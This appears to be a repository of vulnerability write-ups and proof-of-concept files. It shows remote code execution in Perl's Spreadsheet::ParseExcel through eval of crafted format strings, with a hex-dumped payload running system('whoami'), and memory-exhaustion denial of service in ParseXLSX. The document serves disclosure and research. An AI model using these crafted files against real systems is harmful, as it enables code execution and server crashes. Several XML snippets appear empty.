├── ParseXLSX_0days.pptx ├── README.md ├── parse_xlsx_bomb.md └── poc ├── .gitignore ├── README.md ├── bomb ├── Dockerfile ├── ahihi.pl └── ahihi.xlsx ├── rce ├── Dockerfile ├── run.sh ├── test-xls.pl ├── test.pl ├── test.xls └── test.xlsx └── xls-payload.py /ParseXLSX_0days.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/ParseXLSX_0days.pptx -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ParseExcel security vulnerability 2 | 3 | > TL;DR: RCE from logic in parsing format strings. 4 | 5 | ## Short explanation on the exploit 6 | 7 | The root cause of the exploit is a call to `eval` on unvalidated user input in `Utility.pm` 8 | 9 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/Utility.pm#L171 10 | ```perl 11 | # Utility.pm 12 | sub ExcelFmt { 13 | my ( $format_str, $number, $is_1904, $number_type, $want_subformats ) = @_; 14 | 15 | return $number unless $number =~ $qrNUMBER; 16 | 17 | my $conditional; 18 | if ( $format_str =~ /^\[([<>=][^\]]+)\](.*)$/ ) { 19 | $conditional = $1; 20 | $format_str = $2; 21 | } 22 | 23 | #... 24 | 25 | if ($conditional) { 26 | # TODO. Replace string eval with a function. 27 | $section = eval "$number $conditional" ? 0 : 1; 28 | } 29 | #... 30 | } 31 | ``` 32 | 33 | From what I inspected, the current implementation of this flow lacks proper validation, and using `eval` to handle a simple comparison is overkill here. Because of this, both `ParseExcel::parse` and `ParseXLSX::parse` (used for reading data from Excel files) are vulnerable to RCE. 34 | 35 | ### Where's `$format_str`? 
36 | `ValFmt` is the most likely caller of `ExcelFmt`, so I'll look into this method further 37 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L141-L161 38 | ```perl 39 | sub ValFmt { 40 | my ( $oThis, $oCell, $oBook ) = @_; 41 | 42 | my ( $Dt, $iFmtIdx, $iNumeric, $Flg1904 ); 43 | 44 | if ( $oCell->{Type} eq 'Text' ) { 45 | $Dt = 46 | ( ( defined $oCell->{Val} ) && ( $oCell->{Val} ne '' ) ) 47 | ? $oThis->TextFmt( $oCell->{Val}, $oCell->{Code} ) # Perform some encoding logic => doesn't cause RCE 48 | : ''; 49 | 50 | return $Dt; 51 | } 52 | else { 53 | $Dt = $oCell->{Val}; 54 | $Flg1904 = $oBook->{Flg1904}; 55 | my $sFmtStr = $oThis->FmtString( $oCell, $oBook ); 56 | 57 | # where RCE lies => $oCell->{Type} must be either "Date" or "Numeric" 58 | return ExcelFmt( $sFmtStr, $Dt, $Flg1904, $oCell->{Type} ); 59 | } 60 | } 61 | ``` 62 | If `$oCell->{Type}` is anything other than `Text` (that is, `Date` or `Numeric`), `ExcelFmt` will be called. 63 | 64 | The value of `$format_str` is returned from another method: `FmtString` 65 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L101-L136 66 | ```perl 67 | sub FmtString { 68 | my ( $oThis, $oCell, $oBook ) = @_; 69 | 70 | my $sFmtStr = 71 | $oThis->FmtStringDef( $oBook->{Format}[ $oCell->{FormatNo} ]->{FmtIdx}, 72 | $oBook ); # maps to the correct format string 73 | 74 | #... 75 | 76 | unless ( defined($sFmtStr) ) { 77 | # assigns default format string depending on the value, can ignore 78 | #... 
79 | } 80 | return $sFmtStr; 81 | } 82 | ``` 83 | Another function is being called, so we'll examine `FmtStringDef` as well 84 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L87-L96 85 | ```perl 86 | sub FmtStringDef { 87 | my ( $oThis, $iFmtIdx, $oBook, $rhFmt ) = @_; 88 | my $sFmtStr = $oBook->{FormatStr}->{$iFmtIdx}; # does the mapping 89 | 90 | # More with assigning default format string, can ignore 91 | #... 92 | } 93 | ``` 94 | 95 | With all the variables traced, the attack vector can be summarized as follows: 96 | - Inject the malicious format string with index `$iFmtIdx` 97 | - Make sure a cell format `$oBook->{Format}[$cellFmtIdx]` maps to `$iFmtIdx` 98 | - Make sure a cell maps to that cell format (`$oCell->{FormatNo} = $cellFmtIdx`) 99 | ![[flow 1.png]] 100 | 101 | In the sections below, I'll explain in detail how the payload carries the shell command to the `eval` call. There are two sections: parsing an .xls file with `ParseExcel` and parsing an .xlsx file with `ParseXLSX`. 102 | 103 | ## PoC 104 | To demonstrate, below is the link to our crafted malicious Excel files (.xls and .xlsx), which run `whoami` and store the result in `/tmp/inject.txt`. 105 | https://gist.github.com/haile01/0f4f19e4441895ef33ff27385080478b 106 | 107 | ### Exploitation on XLS file 108 | Consider a simple Perl program that parses an .xls file using `ParseExcel::parse`, like the one below. RCE happens while parsing is performed, even before any data is fetched. 109 | 110 | ```perl 111 | use strict; 112 | use Spreadsheet::ParseExcel; 113 | 114 | my $parser = Spreadsheet::ParseExcel->new(); 115 | # test.xls is a malicious file from an end user 116 | my $workbook = $parser->parse("test.xls"); 117 | ``` 118 | 119 | #### Injecting format string 120 | Excel 97 binary files are structured as chunks of binary data called BIFF records. 
Each record starts with a 2-byte header field called `opCode` (little-endian), followed by the 2-byte length of the record and then its actual data. 121 | 122 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L438 123 | ```perl 124 | sub QueryNext { 125 | my ( $q ) = @_; 126 | 127 | 128 | if ( $q->{streamPos} + 4 >= $q->{streamLen} ) { 129 | return 0; 130 | } 131 | 132 | my $data = substr( $q->{stream}, $q->{streamPos}, 4 ); 133 | 134 | ( $q->{opcode}, $q->{length} ) = unpack( 'v2', $data ); 135 | 136 | # No biff record should be larger than around 20,000. 137 | if ( $q->{length} >= 20000 ) { 138 | return 0; 139 | } 140 | 141 | if ( $q->{length} > 0 ) { 142 | $q->{data} = substr( $q->{stream}, $q->{streamPos} + 4, $q->{length} ); 143 | } 144 | else { 145 | $q->{data} = undef; 146 | $q->{dont_decrypt_next_record} = 1; 147 | } 148 | 149 | if ( $q->{encryption} == MS_BIFF_CRYPTO_RC4 ) { 150 | # Handles with decryption 151 | } 152 | elsif ( $q->{encryption} == MS_BIFF_CRYPTO_XOR ) { 153 | # not implemented 154 | return 0; 155 | } 156 | elsif ( $q->{encryption} == MS_BIFF_CRYPTO_NONE ) { 157 | 158 | } 159 | 160 | $q->{streamPos} += 4 + $q->{length}; 161 | 162 | return 1; 163 | } 164 | ``` 165 | 166 | After that, the handler registered for the record type is used to extract the BIFF record data. 
167 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L576-L580 168 | 169 | ```perl 170 | if ( defined $self->{FuncTbl}->{$record} && !$workbook->{_skip_chart} ) 171 | { 172 | $self->{FuncTbl}->{$record} 173 | ->( $workbook, $record, $record_length, $record_header ); 174 | } 175 | ``` 176 | 177 | Format strings are handled by `_subFormat`, with `opCode = 0x41E` 178 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L1563-L1585 179 | ```perl 180 | sub _subFormat { 181 | 182 | my ( $oBook, $bOp, $bLen, $sWk ) = @_; 183 | my $sFmt; 184 | 185 | if ( $oBook->{BIFFVersion} <= verBIFF5 ) { 186 | $sFmt = substr( $sWk, 3, unpack( 'c', substr( $sWk, 2, 1 ) ) ); 187 | $sFmt = $oBook->{FmtClass}->TextFmt( $sFmt, '_native_' ); 188 | } 189 | else { 190 | $sFmt = _convBIFF8String( $oBook, substr( $sWk, 2 ) ); 191 | } 192 | 193 | my $format_index = unpack( 'v', substr( $sWk, 0, 2 ) ); 194 | 195 | # Excel 4 and earlier used an index of 0 to indicate that a built-in format 196 | # that was stored implicitly. 197 | if ( $oBook->{BIFFVersion} <= verBIFF4 && $format_index == 0 ) { 198 | $format_index = keys %{ $oBook->{FormatStr} }; 199 | } 200 | 201 | $oBook->{FormatStr}->{$format_index} = $sFmt; 202 | } 203 | ``` 204 | 205 | I wasn't sure which BIFF version my .xls file uses, but judging by the data in the binary file, it should hit the `else` branch (> `verBIFF5`). 206 | 207 | The structure of a format string record in newer BIFF versions should be 208 | **1E 04 \[record length - 2 bytes\] \[format string index - 2 bytes\] \[format string length - 2 bytes\] \[string flags - 1 byte\] \[format string content\]** 209 | 210 | By following the correct structure, I can inject any format string into the .xls file. 
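To make the record layout concrete, here is a minimal Python sketch that decodes one such record. It assumes the BIFF8 layout (2-byte opcode, 2-byte record length, 2-byte format index, 2-byte character count, 1-byte flags, then one byte per character when the low flag bit is clear). The helper name `decode_format_record` and the sample bytes (a harmless `0.00` format with index 164) are made up for illustration and are not taken from the PoC.

```python
import struct

FORMAT_OPCODE = 0x041E  # opcode dispatched to _subFormat


def decode_format_record(buf: bytes, offset: int = 0):
    """Decode one BIFF8 FORMAT record starting at `offset`.

    Hypothetical helper for illustration only. It handles just the
    single-byte-character case (low bit of the flags byte is 0).
    """
    # Record header: opcode and body length, both little-endian 16-bit.
    opcode, length = struct.unpack_from("<HH", buf, offset)
    if opcode != FORMAT_OPCODE:
        raise ValueError(f"not a FORMAT record: opcode 0x{opcode:04x}")

    body = buf[offset + 4 : offset + 4 + length]
    if len(body) != length:
        raise ValueError("truncated record")

    # Body: format index, character count, string flags.
    fmt_index, char_count, flags = struct.unpack_from("<HHB", body, 0)
    if flags & 0x01:
        raise NotImplementedError("16-bit characters are not handled here")

    text = body[5 : 5 + char_count].decode("latin-1")
    return fmt_index, text


# Made-up sample: index 0x00A4 (164), 4 characters, flags 0, text "0.00".
sample = bytes.fromhex("1e04" "0900" "a400" "0400" "00") + b"0.00"
print(decode_format_record(sample))  # (164, '0.00')
```

Reading records this way is also a convenient starting point for auditing an untrusted file: any format string that starts with `[` followed by `<`, `>`, or `=` is one that `ExcelFmt` would treat as a conditional.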
211 | 212 | The actual BIFF record for the format string I injected in the PoC (format string index is `0x00a5`, stored little-endian as `a5 00`) 213 | ``` 214 | 00000000: 1e04 3100 a500 2c00 005b 3e31 3233 3b73 ..1...,..[>123;s 215 | ^^^^ 216 | format string index 217 | 00000010: 7973 7465 6d28 2777 686f 616d 6920 3e20 ystem('whoami > 218 | 00000020: 2f74 6d70 2f69 6e6a 6563 742e 7478 7427 /tmp/inject.txt' 219 | 00000030: 295d 3132 33 )]123 220 | ``` 221 | 222 | #### Mapping a cell format to the format string 223 | Cell formats define many properties of a cell, such as format string, styling, fonts, ... A cell format links to a format string by including the format string's index in its BIFF record. This logic is handled by `_subXF` 224 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L1441-L1558 225 | 226 | ```perl 227 | sub _subXF { 228 | my ( $oBook, $bOp, $bLen, $sWk ) = @_; 229 | 230 | #... 231 | 232 | if ( $oBook->{BIFFVersion} == verBIFF4 ) { 233 | #... 234 | } 235 | elsif ( $oBook->{BIFFVersion} == verBIFF8 ) { 236 | my ( $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn ); 237 | 238 | ( $iFnt, $iIdx, $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn ) 239 | = unpack( "v7Vv", $sWk ); 240 | #... 241 | } 242 | else { 243 | ( $iFnt, $iIdx, $iGen, $iAlign, $iPtn, $iPtn2, $iBdr1, $iBdr2 ) = 244 | unpack( "v8", $sWk ); 245 | #... 246 | } 247 | 248 | push @{ $oBook->{Format} }, Spreadsheet::ParseExcel::Format->new( 249 | FontNo => $iFnt, 250 | Font => $oBook->{Font}[$iFnt], 251 | FmtIdx => $iIdx, # <- the index that points to format string index 252 | #... 253 | ); 254 | } 255 | ``` 256 | Because our `BIFFVersion` is greater than BIFF5, the first branch is not taken. In the other two, `$iIdx` is the second word of the BIFF data, so this step is trivial as well. 
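The "second word" observation can be checked with a short Python sketch that only reads the field. The helper name `xf_format_index` is hypothetical, and the sample bytes are a made-up XF record (opcode `0x00E0`, 20-byte body) whose second word is `0x00A4`; everything after the first two words is zero padding.

```python
import struct

XF_OPCODE = 0x00E0  # opcode dispatched to _subXF


def xf_format_index(record: bytes) -> int:
    """Return the format-string index stored in an XF record.

    Hypothetical helper for illustration: it mirrors the first two
    fields of unpack("v7Vv", ...) / unpack("v8", ...) in _subXF.
    """
    opcode, length = struct.unpack_from("<HH", record, 0)
    if opcode != XF_OPCODE:
        raise ValueError(f"not an XF record: opcode 0x{opcode:04x}")
    if length < 4 or len(record) < 4 + length:
        raise ValueError("truncated record")

    # First word: font index. Second word: format-string index.
    _font_index, fmt_index = struct.unpack_from("<HH", record, 4)
    return fmt_index


# Made-up sample: header, font index 0, format index 0x00A4, 16 zero bytes.
sample_xf = bytes.fromhex("e000" "1400" "0000" "a400") + bytes(16)
print(hex(xf_format_index(sample_xf)))  # 0xa4
```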
257 | 258 | The actual BIFF record for the cell format I used in the PoC 259 | ``` 260 | 00000000: e000 1400 0000 a500 f5ff 2000 0000 0000 .......... ..... 261 | ^^^^ 262 | format string index 263 | 00000010: 0000 0000 0000 c020 ....... 264 | ``` 265 | Moreover, cell formats are identified by their index in a list. I modified the first record, so my cell format index is `0` 266 | 267 | #### Mapping a cell to the cell format 268 | For a cell to apply a format, it should include the ID of the cell format inside the cell's BIFF record. However, as I mentioned before, only cells of type `Numeric` or `Date` can trigger the RCE, so I'll use a cell with date type for the PoC (referred to as an RK BIFF record). 269 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L918-L939 270 | 271 | ```perl 272 | sub _subRK { 273 | my ( $workbook, $biff_number, $length, $data ) = @_; 274 | my ( $row, $col, $format_index, $rk_number ) = unpack( 'vvvV', $data ); 275 | my $number = _decode_rk_number( $rk_number ); 276 | 277 | _NewCell( 278 | $workbook, $row, $col, 279 | Kind => 'RK', 280 | Val => $number, 281 | FormatNo => $format_index, 282 | Format => $workbook->{Format}->[$format_index], 283 | Numeric => 1, 284 | Code => undef, 285 | Book => $workbook, 286 | ); 287 | #... 288 | } 289 | ``` 290 | We can see that the index that maps to a cell format is now the third word of the record, so all we need to do is zero out this word (`\x00\x00`) 291 | 292 | The actual BIFF record for the date cell I used in the PoC 293 | ``` 294 | 00000000: 7e02 0a00 0000 0000 0000 201a e240 ~......... ..@ 295 | ^^^^ 296 | format index 297 | ``` 298 | 299 | Note that the method `_subRK` doesn't explicitly set the type `Date` yet. 
Type checking is implemented in `ChkType` instead 300 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L166-L181 301 | 302 | ```perl 303 | sub ChkType { 304 | my ( $oPkg, $iNumeric, $iFmtIdx ) = @_; 305 | if ($iNumeric) { 306 | if ( ( ( $iFmtIdx >= 0x0E ) && ( $iFmtIdx <= 0x16 ) ) 307 | || ( ( $iFmtIdx >= 0x2D ) && ( $iFmtIdx <= 0x2F ) ) ) 308 | { 309 | return "Date"; 310 | } 311 | else { 312 | return "Numeric"; 313 | } 314 | } 315 | else { 316 | return "Text"; 317 | } 318 | } 319 | ``` 320 | Since `$iNumeric` is set to `1`, we can be sure that the type is not `Text` 321 | 322 | Finally, when a new `Cell` object is initialized, `ValFmt` is called and the execution chain continues, propagating our shell command to the `eval` call. 323 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel.pm#L2375-L2433 324 | 325 | ### Exploitation on XLSX file 326 | Working with .xlsx files is considerably easier, since we can directly modify the data in plaintext (XML format). 327 | Consider a simple Perl program that parses an .xlsx file using `ParseXLSX::parse`, like the one below. RCE happens while parsing is performed, even before any data is fetched. 328 | 329 | ```perl 330 | use strict; 331 | use Spreadsheet::ParseExcel; 332 | use Spreadsheet::ParseXLSX; 333 | 334 | my $parser = Spreadsheet::ParseXLSX->new(); 335 | # test.xlsx is a malicious file from an end user 336 | my $workbook = $parser->parse("test.xlsx"); 337 | ``` 338 | An XLSX file is a zip archive containing many XML files, each holding a specific type of workbook data. 
339 | Below is an example of the folder structure: 340 | ``` 341 | |- [Content_Types].xml 342 | |- _rels 343 | |- docProps 344 | |- app.xml 345 | |- core.xml 346 | |- xl 347 | |- _rels 348 | |- workbook.xml.rels 349 | |- styles.xml <--- Format strings & cell formats 350 | |- workbook.xml 351 | |- sharedStrings.xml 352 | |- theme 353 | |- theme1.xml 354 | |- worksheets 355 | |- sheet1.xml <--- Cell values 356 | ``` 357 | 358 | #### Injecting format string & mapping to a cell format 359 | Format strings are stored in the `xl/styles.xml` file under the `<numFmts>` tag, while cell formats are defined under the `<cellXfs>` tag. 360 | https://github.com/doy/spreadsheet-parsexlsx/blob/80198923186bedda61d4dceb0272210dc8bec533/lib/Spreadsheet/ParseXLSX.pm#L630-L923 361 | 362 | ```perl 363 | sub _parse_styles { 364 | # ... 365 | my %format_str = ( 366 | %default_format_str, 367 | (map { 368 | $_->att('numFmtId') => $_->att('formatCode') 369 | } $styles->find_nodes('//s:numFmts/s:numFmt')), 370 | ); 371 | # ... 372 | my @format = map { 373 | my %opts = ( 374 | %default_format_opts, 375 | %ignore, 376 | ); 377 | # ... 378 | $opts{FmtIdx} = 0+($xml_fmt->att('numFmtId')||0); 379 | # ... 380 | Spreadsheet::ParseExcel::Format->new(%opts) 381 | } $styles->find_nodes('//s:cellXfs/s:xf'); 382 | # ... 383 | 384 | 385 | return { 386 | FormatStr => \%format_str, 387 | Font => \@font, 388 | Format => \@format, 389 | } 390 | } 391 | ``` 392 | 393 | To inject a format string, we need to add a `<numFmt>` tag, with `formatCode` set to the format string and `numFmtId` set to any integer we want. Here I used `123`. 394 | 395 | After that, we add one more `<xf>` entry that maps to the format string by setting its `numFmtId` attribute to our chosen id (`123`) 396 | 397 | The final XML data I used in the PoC 398 | ```xml 399 | 400 | 401 | 402 | ... 403 | 404 | 405 | 406 | 407 | ... 408 | 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | ... 
418 | 419 | ``` 420 | 421 | #### Mapping a cell to the cell format 422 | https://github.com/doy/spreadsheet-parsexlsx/blob/80198923186bedda61d4dceb0272210dc8bec533/lib/Spreadsheet/ParseXLSX.pm#L205-L487 423 | ```perl 424 | sub _parse_sheet { 425 | my $sheet_xml = $self->_new_twig( 426 | twig_roots => { 427 | #... 428 | 's:sheetData/s:row' => sub { 429 | my ( $twig, $row_elt ) = @_; 430 | for my $cell ( $row_elt->children('s:c') ){ 431 | my $type = $cell->att('t') || 'n'; 432 | my $val = $val_xml ? $val_xml->text : undef; 433 | 434 | #... 435 | elsif ($type eq 'n') { 436 | $long_type = 'Numeric'; 437 | $val = defined($val) ? 0+$val : undef; 438 | } 439 | elsif ($type eq 'd') { 440 | $long_type = 'Date'; 441 | } 442 | # other $type results into $long_type = 'Text' 443 | #... 444 | 445 | my $format_idx = $cell->att('s') || 0; 446 | my $format = $sheet->{_Book}{Format}[$format_idx]; 447 | die "unknown format $format_idx" unless $format; 448 | 449 | my $cell = Spreadsheet::ParseExcel::Cell->new( 450 | Val => $val, 451 | Type => $long_type, 452 | Merged => undef, # fix up later 453 | Format => $format, 454 | FormatNo => $format_idx, 455 | ($formula 456 | ? (Formula => $formula->text) 457 | : ()), 458 | Rich => $Rich, 459 | ); 460 | $cell->{_Value} = $sheet->{_Book}{FmtClass}->ValFmt( 461 | $cell, $sheet->{_Book} 462 | ); 463 | } 464 | } 465 | } 466 | ) 467 | } 468 | ``` 469 | The logic for reading cell data in this library is more straightforward: the type and value are assigned directly from XML tag attributes. Since we need `$oCell->{Type}` to be `Date` or `Numeric`, we just need attribute `t` to be `d` or `n`. To map the cell to the cell format, we also set attribute `s` to the index of the cell format (`3`). 470 | 471 | The final XML data I used in the PoC 472 | ```xml 473 | 474 | 475 | 476 | ... 477 | 478 | 479 | 480 | 0 481 | 482 | 483 | 484 | 485 | ... 
486 | 487 | ``` 488 | -------------------------------------------------------------------------------- /parse_xlsx_bomb.md: -------------------------------------------------------------------------------- 1 | # ParseXLSX security vulnerabilities 2 | 3 | > TL;DR: memory utilization go brrrr 4 | 5 | ## DoS via out-of-memory bugs 6 | 7 | ### Analysis 8 | 9 | ParseXLSX also handles merged cells, but because it records the merged state of every covered cell up front, an attacker can force it to allocate an arbitrary amount of memory. 10 | 11 | ```perl 12 | # ParseXLSX.pm 13 | sub _parse_sheet { 14 | my $sheet_xml = $self->_new_twig( 15 | twig_roots => { 16 | #... 17 | 's:mergeCells/s:mergeCell' => sub { 18 | my ( $twig, $merge_area ) = @_; 19 | 20 | if (my $ref = $merge_area->att('ref')) { 21 | my ($topleft, $bottomright) = $ref =~ /([^:]+):([^:]+)/; 22 | 23 | # Parse cell coordinates to numeric 24 | my ($toprow, $leftcol) = $self->_cell_to_row_col($topleft); 25 | my ($bottomrow, $rightcol) = $self->_cell_to_row_col($bottomright); 26 | 27 | push @{ $sheet->{MergedArea} }, [ 28 | $toprow, $leftcol, 29 | $bottomrow, $rightcol, 30 | ]; 31 | 32 | # Saves merged state for each cell in the merged cell 33 | for my $row ($toprow .. $bottomrow) { 34 | for my $col ($leftcol .. $rightcol) { 35 | $merged_cells{"$row;$col"} = 1; 36 | } 37 | } 38 | } 39 | 40 | $twig->purge; 41 | }, 42 | } 43 | ) 44 | } 45 | 46 | sub _cell_to_row_col { 47 | my $self = shift; 48 | my ($cell) = @_; 49 | 50 | my ($col, $row) = $cell =~ /([A-Z]+)([0-9]+)/; 51 | 52 | my $ncol = 0; 53 | for my $char (split //, $col) { 54 | $ncol *= 26; 55 | $ncol += ord($char) - ord('A') + 1; 56 | } 57 | $ncol = $ncol - 1; 58 | 59 | my $nrow = $row - 1; 60 | 61 | return ($nrow, $ncol); 62 | } 63 | ``` 64 | 65 | Because the size of a merged area has no constraints, the program can be made to allocate a huge amount of memory, exhaust swap, and crash the server. 
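One way to see the scale of the problem, and to guard against it, is to compute how many cells a `ref` covers before looping over them. The Python sketch below ports the arithmetic of `_cell_to_row_col` and rejects oversized ranges. The names `merged_cell_count` and `check_merge_ref`, the cap of one million cells, and the sample refs are all assumptions made for illustration; this is not the library's actual fix.

```python
import re

MAX_MERGED_CELLS = 1_000_000  # arbitrary cap chosen for this sketch

# Stricter than the Perl regex: the whole string must be letters then digits.
_CELL_RE = re.compile(r"([A-Z]+)([0-9]+)")


def cell_to_row_col(cell: str):
    """Port of _cell_to_row_col: 'B3' -> (2, 1), both zero-based."""
    match = _CELL_RE.fullmatch(cell)
    if match is None:
        raise ValueError(f"bad cell reference: {cell!r}")
    col_letters, row_digits = match.groups()
    ncol = 0
    for ch in col_letters:
        ncol = ncol * 26 + (ord(ch) - ord("A") + 1)
    return int(row_digits) - 1, ncol - 1


def merged_cell_count(ref: str) -> int:
    """Number of cells covered by a merge ref such as 'A1:B2'."""
    top_left, bottom_right = ref.split(":", 1)
    top, left = cell_to_row_col(top_left)
    bottom, right = cell_to_row_col(bottom_right)
    if bottom < top or right < left:
        raise ValueError(f"inverted range: {ref!r}")
    return (bottom - top + 1) * (right - left + 1)


def check_merge_ref(ref: str, limit: int = MAX_MERGED_CELLS) -> int:
    """Return the cell count, or raise if the range exceeds `limit`."""
    count = merged_cell_count(ref)
    if count > limit:
        raise ValueError(f"merge range {ref!r} covers {count} cells")
    return count


print(merged_cell_count("A1:B2"))      # 4
print(merged_cell_count("A1:ZZ1000"))  # 702000
```

The count is computed with a few multiplications, so the check itself costs nothing even when the range is enormous. The per-cell hash in the Perl code, by contrast, grows linearly with that count.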
66 | 67 | ### Final POC 68 | In `xl/worksheets/sheet1.xml`, add 69 | ```xml 70 | 71 | 72 | 73 | ``` 74 | inside `` tag, or modify the `ref` attribute of any existing `<mergeCell>` tag. 75 | 76 | This would make the program allocate at least $26^3 \cdot 10^4 \approx 4.5 \cdot 10^9$ bytes just for handling merged cells. 77 | 78 | ### Mitigation 79 | I think this vulnerability can be fixed in either of two ways: 80 | - Set a limit on the range inside the `_cell_to_row_col` subroutine 81 | - Use a different method to handle merged cells, instead of preemptively marking every cell as the current solution does. 82 | -------------------------------------------------------------------------------- /poc/.gitignore: -------------------------------------------------------------------------------- 1 | tmp/ 2 | .DS_STORE 3 | .vscode/ 4 | -------------------------------------------------------------------------------- /poc/README.md: -------------------------------------------------------------------------------- 1 | ## POC for ParseExcel and ParseXLSX vulnerabilities 2 | ### Memory exhaustion 3 | Build and run the docker image in the `/bomb` folder, using this command 4 | 5 | `docker build -t perl-xlsx-bomb . && docker run --name perl-xlsx-bomb -m 4g -d perl-xlsx-bomb` 6 | 7 | `4g` limits the memory available to the docker container. 8 | The process keeps filling memory and swap until it is finally terminated for running out of resources 9 | 10 | ### RCE 11 | Build and run the docker image in `/rce`, using this command 12 | 13 | `docker build -t parseexcel-rce . && docker run parseexcel-rce` 14 | 15 | Notice that the RCE results in `root` being written to `/tmp/inject.txt` after each perl run 16 | 17 | #### .xls exploit 18 | Because the data is binary, it's quite hard to modify manually, so I wrote a small script, `xls-payload.py`, to do that. 19 | Also, there are a lot of flag checks and integrity checks on the xls branch, and I chose not to dig into all of that. And now I have zero idea what it does. 
So the overall idea of the script is to manually add a custom format in the Excel app as a placeholder that matches the length of the desired payload. Then the script overwrites that placeholder and does some format mapping. And voilà. 20 | 21 | Here are the steps: 22 | 1. Run `xls-payload.py`, copy the placeholder (please also copy the quotation marks on both ends) 23 | 2. Create a `test.xls` file in the same folder (make sure to use the Excel app on Windows; not sure why, but Excel on macOS, OpenOffice, and LibreOffice strip some flags that we need). Input a number in a cell. Go to `Format Cell` > `Custom` and paste the placeholder. Now that cell should show a bunch of `a`s 24 | 3. Press Enter in the script once more. The xls file is now corrupted (make sure you don't open the file again in the Excel app, or the payload will be gone). Then `mv test.xls rce/` and start a docker container to verify. 25 | -------------------------------------------------------------------------------- /poc/bomb/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM perl:5.32 2 | 3 | COPY ahihi.xlsx /app/ahihi.xlsx 4 | COPY ahihi.pl /app/ahihi.pl 5 | WORKDIR /app 6 | RUN cpanm Spreadsheet::ParseXLSX 7 | 8 | CMD ["perl", "ahihi.pl"] 9 | -------------------------------------------------------------------------------- /poc/bomb/ahihi.pl: -------------------------------------------------------------------------------- 1 | use Spreadsheet::ParseXLSX; 2 | use Spreadsheet::ParseExcel; 3 | use open qw( :std :encoding(UTF-8) ); 4 | 5 | my $t = time(); 6 | my $parser = Spreadsheet::ParseXLSX->new(); 7 | my $workbook = $parser->parse("ahihi.xlsx") or die $parser->error; 8 | 9 | $t = time() - $t; 10 | print "Parsing took $t secs"; 11 | -------------------------------------------------------------------------------- /poc/bomb/ahihi.xlsx: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/bomb/ahihi.xlsx -------------------------------------------------------------------------------- /poc/rce/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM perl:5.32 2 | 3 | COPY . /app 4 | WORKDIR /app 5 | RUN cpanm Spreadsheet::ParseExcel@0.65 6 | RUN cpanm Spreadsheet::ParseXLSX@0.27 7 | 8 | CMD bash run.sh 9 | -------------------------------------------------------------------------------- /poc/rce/run.sh: -------------------------------------------------------------------------------- 1 | echo "=== POC for ParseXLSX ===" 2 | rm /tmp/inject.txt 3 | perl test.pl 4 | cat /tmp/inject.txt 5 | 6 | echo "=== POC for ParseExcel ===" 7 | rm /tmp/inject.txt 8 | perl test-xls.pl 9 | cat /tmp/inject.txt 10 | -------------------------------------------------------------------------------- /poc/rce/test-xls.pl: -------------------------------------------------------------------------------- 1 | use Spreadsheet::ParseExcel; 2 | use open qw( :std :encoding(UTF-8) ); 3 | 4 | my $parser = Spreadsheet::ParseExcel->new(); 5 | my $workbook = $parser->parse("test.xls") or die $parser->error; 6 | -------------------------------------------------------------------------------- /poc/rce/test.pl: -------------------------------------------------------------------------------- 1 | use Spreadsheet::ParseXLSX; 2 | use Spreadsheet::ParseExcel; 3 | use open qw( :std :encoding(UTF-8) ); 4 | 5 | my $parser = Spreadsheet::ParseXLSX->new(); 6 | my $workbook = $parser->parse("test.xlsx") or die $parser->error; 7 | -------------------------------------------------------------------------------- /poc/rce/test.xls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/rce/test.xls 
